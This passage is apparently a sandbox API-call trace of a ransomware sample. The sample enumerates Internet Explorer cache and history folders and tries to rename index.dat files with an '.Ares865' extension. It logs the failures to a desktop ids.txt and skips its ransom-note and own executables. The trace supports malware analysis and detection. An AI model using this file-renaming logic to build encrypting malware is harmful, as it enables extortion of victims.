ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.381] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.381] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0105.475] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 184 [0105.475] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.476] GetLastError () returned 0x20 [0105.476] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 206 [0105.476] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 206 [0105.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.477] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6412 [0105.477] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xce, lpOverlapped=0x0) returned 1 [0105.478] CloseHandle (hObject=0x118) returned 1 [0105.478] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.478] CloseHandle (hObject=0x0) returned 0 [0105.478] CloseHandle (hObject=0x0) returned 0 [0105.478] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.478] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.478] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 167 [0105.528] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.528] GetLastError () returned 0x20 [0105.528] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 189 [0105.528] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 189 [0105.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.530] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x64e0 [0105.530] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xbd, lpOverlapped=0x0) returned 1 [0105.530] CloseHandle (hObject=0x118) returned 1 [0105.530] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.531] CloseHandle (hObject=0x0) returned 0 [0105.531] CloseHandle (hObject=0x0) returned 0 [0105.531] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.531] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.531] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 192 [0105.531] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.531] GetLastError () returned 0x20 [0105.531] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 214 [0105.532] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 214 [0105.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.532] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x659d [0105.532] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xd6, lpOverlapped=0x0) returned 1 [0105.533] CloseHandle (hObject=0x118) returned 1 [0105.533] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.533] CloseHandle (hObject=0x0) returned 0 [0105.533] CloseHandle (hObject=0x0) returned 0 [0105.533] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.533] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.533] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0105.694] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 201 [0105.694] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.694] GetLastError () returned 0x20 [0105.694] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 223 [0105.694] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 223 [0105.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.695] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6673 [0105.695] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xdf, lpOverlapped=0x0) returned 1 [0105.696] CloseHandle (hObject=0x118) returned 1 [0105.696] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.696] CloseHandle (hObject=0x0) returned 0 [0105.696] CloseHandle (hObject=0x0) returned 0 [0105.696] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.696] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.696] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.719] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 184 [0105.719] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.719] GetLastError () returned 0x20 [0105.719] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 206 [0105.719] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 206 [0105.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.720] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6752 [0105.720] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xce, lpOverlapped=0x0) returned 1 [0105.720] CloseHandle (hObject=0x118) returned 1 [0105.720] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.720] CloseHandle (hObject=0x0) returned 0 [0105.721] CloseHandle (hObject=0x0) returned 0 [0105.721] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.721] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.721] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.721] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 209 [0105.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.721] GetLastError () returned 0x20 [0105.721] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 231 [0105.721] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 231 [0105.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.722] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6820 [0105.722] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xe7, lpOverlapped=0x0) returned 1 [0105.722] CloseHandle (hObject=0x118) returned 1 [0105.723] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.723] CloseHandle (hObject=0x0) returned 0 [0105.723] CloseHandle (hObject=0x0) returned 0 [0105.723] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.723] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.723] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0105.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 218 [0105.741] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.741] GetLastError () returned 0x20 [0105.741] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 240 [0105.741] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 240 [0105.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.742] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6907 [0105.742] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf0, lpOverlapped=0x0) returned 1 [0105.742] CloseHandle (hObject=0x118) returned 1 [0105.742] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.742] CloseHandle (hObject=0x0) returned 0 [0105.742] CloseHandle (hObject=0x0) returned 0 [0105.742] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.742] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.743] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0105.892] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 201 [0105.892] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.892] GetLastError () returned 0x20 [0105.892] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 223 [0105.892] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 223 [0105.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.893] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x69f7 [0105.894] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xdf, lpOverlapped=0x0) returned 1 [0105.894] CloseHandle (hObject=0x118) returned 1 [0105.894] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.894] CloseHandle (hObject=0x0) returned 0 [0105.894] CloseHandle (hObject=0x0) returned 0 [0105.894] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 